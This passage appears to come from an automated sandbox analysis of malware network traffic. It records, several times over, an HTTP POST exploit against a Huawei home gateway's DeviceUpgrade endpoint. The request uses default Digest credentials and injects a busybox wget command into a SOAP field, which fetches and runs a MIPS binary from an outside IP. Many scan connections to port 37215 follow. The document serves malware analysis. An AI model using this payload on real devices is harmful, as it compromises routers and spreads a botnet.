6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.88.204.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.78.56.174:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.63.127.48:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.27.169.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.99.21.67:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.249.91.212:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.203.69.60:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.123.230.191:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.175.90.116:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.65.10.120:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.248.129.190:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.68.195.175:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.84.219.122:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.169.75.102:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.227.70.241:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.224.113.211:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.52.101.221:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.132.5.65:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.221.247.10:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.229.64.118:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.138.73.153:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.161.228.29:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.130.10.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.174.12.227:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.176.189.127:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.122.41.101:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.229.47.203:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.151.165.81:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.8.123.134:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.88.135.216:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.247.14.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.121.238.157:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.179.88.134:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.73.98.82:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.234.64.234:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.179.127.175:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.34.162.197:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.27.123.92:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.189.131.5:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.149.164.1:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.11.158.47:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.104.86.199:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.50.29.120:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.115.29.144:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.229.178.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.52.117.9:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.90.118.212:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.76.128.80:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.47.61.252:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.226.2.177:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.61.177.32:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.234.211.94:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.214.92.10:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.237.196.136:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.110.149.99:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.107.27.188:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.190.76.219:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.53.0.22:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.75.54.212:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.108.155.116:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.99.112.64:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.1.33.36:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.175.244.157:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.41.37.71:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.36.95.251:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.47.62.103:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.102.188.4:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.54.72.48:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.133.229.217:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.79.52.163:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.232.89.77:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.60.127.213:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.232.70.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.146.98.190:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.98.53.198:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.159.63.137:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.119.88.105:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.123.30.181:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.166.11.98:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.155.163.55:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.176.64.160:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.103.227.254:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.83.209.208:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.166.220.204:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.217.101.242:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.158.113.66:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.251.75.7:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.73.161.28:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.44.212.43:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.160.26.232:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.110.237.42:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.250.167.242:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.102.39.103:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.135.51.63:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 197.116.191.155:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.241.105.50:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 41.110.23.168:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.47.87.234:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.35.63.125:37215
Source: global traffic	TCP traffic: 192.168.2.23:56563 -> 156.146.248.23:37215
